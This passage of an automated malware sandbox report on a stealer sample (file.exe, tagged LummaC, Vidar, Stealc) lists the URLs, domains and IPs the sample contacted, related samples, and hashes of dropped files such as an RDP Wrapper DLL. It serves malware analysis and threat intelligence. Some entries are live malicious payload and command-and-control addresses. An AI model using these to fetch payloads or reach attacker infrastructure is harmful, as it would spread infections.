http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1222150http://147.45.44.104/prog/66f5db9e	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://offensivedzvju.shop/pi	RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://147.45.44.104	JKEHIIJJEC.exe, 00000010.00000002.2514195438.0000000002481000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/ts1ca.crl0	file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/workshop/	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fragnantbui.shop/HDQ	RegAsm.exe, 0000000C.00000002.2189236179.0000000001445000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://login.steampowered.com/	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/legal/	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://5.75.211.162ta	RegAsm.exe, 0000000F.00000002.2525117231.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU	RDPWInst.exe, 00000017.00000000.2112865515.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	JJJJKE.3.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aia.entrust.net/ts1-chain256.cer01	file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	false	URL Reputation: safe	unknown
https://ballotnwu.site/api8D	RegAsm.exe, 0000000C.00000002.2189236179.0000000001445000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/	RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://5.75.211.162/gz	RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://127.0.0.1:27060	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://hansgborn.eu	JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000251E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.1620.5938.132	RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, BAECFH.3.dr	false	URL Reputation: safe	unknown
https://api.steampowered.com/	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta	RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, BAECFH.3.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/mobile	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://5.75.211.162/j9	RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://player.vimeo.com	RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://api.ipify.orgd	JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000251E000.00000004.00000800.00020000.00000000.sdmp, JKEHIIJJEC.exe, 00000010.00000002.2514195438.0000000002514000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://hansgborn.eud	JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000251E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869/badges	RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.77.130	reinforcenh.shop	United States	13335	CLOUDFLARENETUS	true
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
172.67.132.32	gutterydhowi.shop	United States	13335	CLOUDFLARENETUS	true
8.46.123.33	unknown	United States	62713	AS-PUBMATICUS	true
104.21.2.13	ballotnwu.site	United States	13335	CLOUDFLARENETUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
104.21.58.182	drawzhotdog.shop	United States	13335	CLOUDFLARENETUS	true
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true
188.114.97.3	fragnantbui.shop	European Union	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.36.139	wallkedsleeoi.shop	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	offensivedzvju.shop	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
5.75.211.162	unknown	Germany	24940	HETZNER-ASDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519882
Start date and time:	2024-09-27 01:47:50 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@59/44@16/14
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 94 Number of non-executed functions: 257
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
19:49:18	API Interceptor	4x Sleep call for process: RegAsm.exe modified
19:50:35	API Interceptor	1x Sleep call for process: JKEHIIJJEC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.77.130	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	downloaddining3.com/h9fmdW7/index.php
	am.exe	Get hash	malicious	Amadey	Browse	downloaddining3.com/h9fmdW7/index.php
	am.exe	Get hash	malicious	Amadey	Browse	downloaddining3.com/h9fmdW7/index.php
104.26.12.205	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
cowod.hopto.org	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
fragnantbui.shop	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://telstra-108674.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	https://business-suport-center.bond/100069662302758	Get hash	malicious	Unknown	Browse	104.26.8.218
	http://click-here-108291.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	http://support-case-review-id-896051270.dn1mnpd5g34w7.amplifyapp.com/	Get hash	malicious	Unknown	Browse	104.26.5.15
	http://air-bnb-black.vercel.app/	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.194.216
	lvHIHLt0b2.exe	Get hash	malicious	DCRat	Browse	104.20.3.235
	http://attnet-101599.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	162.159.136.66
	https://lothanse-heracklarne.pages.dev/help/contact/547074160798771	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://verdadeoculta.com.br/redirect.php?v=1f9664cf5aef491&email=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
CLOUDFLARENETUS	http://telstra-108674.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	https://business-suport-center.bond/100069662302758	Get hash	malicious	Unknown	Browse	104.26.8.218
	http://click-here-108291.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	http://support-case-review-id-896051270.dn1mnpd5g34w7.amplifyapp.com/	Get hash	malicious	Unknown	Browse	104.26.5.15
	http://air-bnb-black.vercel.app/	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.194.216
	lvHIHLt0b2.exe	Get hash	malicious	DCRat	Browse	104.20.3.235
	http://attnet-101599.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	162.159.136.66
	https://lothanse-heracklarne.pages.dev/help/contact/547074160798771	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://verdadeoculta.com.br/redirect.php?v=1f9664cf5aef491&email=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
CLOUDFLARENETUS	http://telstra-108674.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	https://business-suport-center.bond/100069662302758	Get hash	malicious	Unknown	Browse	104.26.8.218
	http://click-here-108291.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	http://support-case-review-id-896051270.dn1mnpd5g34w7.amplifyapp.com/	Get hash	malicious	Unknown	Browse	104.26.5.15
	http://air-bnb-black.vercel.app/	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	172.67.194.216
	lvHIHLt0b2.exe	Get hash	malicious	DCRat	Browse	104.20.3.235
	http://attnet-101599.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	162.159.136.66
	https://lothanse-heracklarne.pages.dev/help/contact/547074160798771	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://verdadeoculta.com.br/redirect.php?v=1f9664cf5aef491&email=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
AS-PUBMATICUS	http://telstra-108674.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	185.64.191.210
	http://click-here-108291.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	185.64.191.210
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	8.46.123.33
	http://attnet-101599.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	185.64.191.210
	http://uphooldlogua.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	185.64.191.210
	http://home-100945.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	http://shaw-106427.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	https://phanetomwllet.gitbook.io/us	Get hash	malicious	Unknown	Browse	198.47.127.205
	http://sky-108090.weeblysite.com/	Get hash	malicious	Unknown	Browse	198.47.127.205
	http://btinternet-101458.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	http://giviminqoving.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	SecuriteInfo.com.Adware.DownwareNET.4.15389.24193.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://www.petrhub.info/	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	lvHIHLt0b2.exe	Get hash	malicious	DCRat	Browse	188.114.96.3
	http://pldw.peoplebankweb.cc/	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Adware.DownwareNET.4.15389.24193.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://dev-55550141554.pantheonsite.io/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://creditoman-bc.om/	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://uphooldlogua.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.77.130 188.114.97.3 172.67.132.32 104.21.36.139 188.114.96.3 104.102.49.254 104.21.2.13 104.21.58.182
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.77.130 188.114.97.3 172.67.132.32 104.21.36.139 188.114.96.3 104.102.49.254 104.21.2.13 104.21.58.182
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.21.77.130 188.114.97.3 172.67.132.32 104.21.36.139 188.114.96.3 104.102.49.254 104.21.2.13 104.21.58.182
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.77.130 188.114.97.3 172.67.132.32 104.21.36.139 188.114.96.3 104.102.49.254 104.21.2.13 104.21.58.182
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.77.130 188.114.97.3 172.67.132.32 104.21.36.139 188.114.96.3 104.102.49.254 104.21.2.13 104.21.58.182
	Baylor financial-RemittanceSeptember 26, 2024_-YTRKOKQTQALJDQKMPCNJ.xlsx	Get hash	malicious	Unknown	Browse	104.21.77.130 188.114.97.3 172.67.132.32 104.21.36.139 188.114.96.3 104.102.49.254 104.21.2.13 104.21.58.182
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.77.130 188.114.97.3 172.67.132.32 104.21.36.139 188.114.96.3 104.102.49.254 104.21.2.13 104.21.58.182
	file.exe	Get hash	malicious	LummaC	Browse	104.21.77.130 188.114.97.3 172.67.132.32 104.21.36.139 188.114.96.3 104.102.49.254 104.21.2.13 104.21.58.182
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.77.130 188.114.97.3 172.67.132.32 104.21.36.139 188.114.96.3 104.102.49.254 104.21.2.13 104.21.58.182
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.77.130 188.114.97.3 172.67.132.32 104.21.36.139 188.114.96.3 104.102.49.254 104.21.2.13 104.21.58.182
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.Adware.DownwareNET.4.15389.24193.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.102.49.254
	SecuriteInfo.com.Adware.DownwareNET.4.15389.24193.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\RDP Wrapper\rdpwrap.dll	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	smss.exe	Get hash	malicious	RMSRemoteAdmin, RDPWrap Tool, xRAT	Browse
	CVE-2024-38143 poc.exe	Get hash	malicious	Codoso Ghost, UACMe	Browse
	LisectAVT_2403002A_44.exe	Get hash	malicious	AveMaria, UACMe	Browse
	6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe	Get hash	malicious	AveMaria, UACMe	Browse
	234880953-042446-sanlccjavap0003-3849.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse
	YQR4CA11sP.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse
C:\ProgramData\EBAAFCAFCB.exe	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse

Created / dropped Files

C:\Program Files\RDP Wrapper\rdpwrap.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	116736
Entropy (8bit):	5.884975745255681
Encrypted:	false
SSDEEP:	3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
MD5:	461ADE40B800AE80A40985594E1AC236
SHA1:	B3892EEF846C044A2B0785D54A432B3E93A968C8
SHA-256:	798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
SHA-512:	421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54%
